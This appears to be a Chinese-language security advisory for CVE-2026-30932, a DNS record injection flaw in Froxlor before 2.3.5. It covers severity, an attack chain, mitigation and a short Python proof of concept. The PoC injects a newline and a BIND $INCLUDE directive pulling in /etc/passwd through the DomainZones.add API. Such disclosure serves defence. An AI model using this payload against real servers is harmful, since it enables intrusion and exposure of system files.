IPBUF安全漏洞报告
English
CVE-2026-30932 CVSS 8.8 高危

CVE-2026-30932 Froxlor DNS记录注入漏洞

披露日期: 2026-03-24
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-30932
漏洞类型
配置注入
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Froxlor

相关标签

Froxlor配置注入DNSCVE-2026-30932RCE

漏洞概述

Froxlor 2.3.5之前版本存在DNS配置注入漏洞。攻击者可通过DomainZones.add API接口,在LOC、RP等DNS记录的content字段中注入换行符和BIND指令(如$INCLUDE),导致恶意内容写入磁盘区域文件,从而可能造成远程代码执行或数据篡改。

技术细节

该漏洞源于Froxlor的DomainZones.add API端点对特定DNS记录类型(LOC, RP, SSHFP, TLSA)的content字段缺乏严格的输入验证。攻击者可利用低权限账户,在content字段中注入换行符和BIND区域文件指令(如$INCLUDE)。当DNS重建定时任务执行时,这些未经过滤的输入会被直接写入磁盘上的BIND区域配置文件。通过注入$INCLUDE指令,攻击者可迫使BIND服务加载包含恶意配置的外部文件,可能导致服务器被完全控制或敏感信息泄露。

攻击链分析

STEP 1
1. 信息收集
识别运行Froxlor且版本低于2.3.5的目标服务器,确认DNS管理功能已开启。
STEP 2
2. 获取权限
注册或获取一个具有客户权限且已启用DNS管理功能的账户凭证。
STEP 3
3. 漏洞利用
向DomainZones.add API端点发送请求,利用LOC、RP等记录类型,在content字段注入包含换行符和$INCLUDE指令的恶意Payload。
STEP 4
4. 触发写入
等待系统执行DNS重建的Cron定时任务,将恶意数据写入磁盘上的BIND区域文件。
STEP 5
5. 达成效果
BIND服务重新加载配置,执行恶意指令,可能导致读取敏感文件或远程代码执行。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL for the vulnerable Froxlor instance target_url = "https://target-froxlor-domain.com/admin_index.php" # Payload demonstrating the injection of a BIND directive # The newline character (\n) breaks out of the current record format # $INCLUDE forces BIND to load an external file payload = "normal_record_data\n$INCLUDE /etc/passwd" # Authenticate and get session cookie (Step omitted for brevity) session = requests.Session() # session.post(...) # Exploit the vulnerable API endpoint data = { "action": "dnszones.add", "type": "LOC", # Vulnerable type: LOC, RP, SSHFP, or TLSA "record": "example.com", "content": payload } response = session.post(target_url, data=data) print(f"Status Code: {response.status_code}") if response.status_code == 200: print("Payload injected successfully. Wait for the DNS rebuild cron job.")

影响范围

Froxlor < 2.3.5

防御指南

临时缓解措施
建议立即升级到修复版本。如暂时无法升级,应禁用DNS自动重建功能或通过WAF拦截包含换行符、$INCLUDE等BIND指令的API请求,并人工审核区域文件变更。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表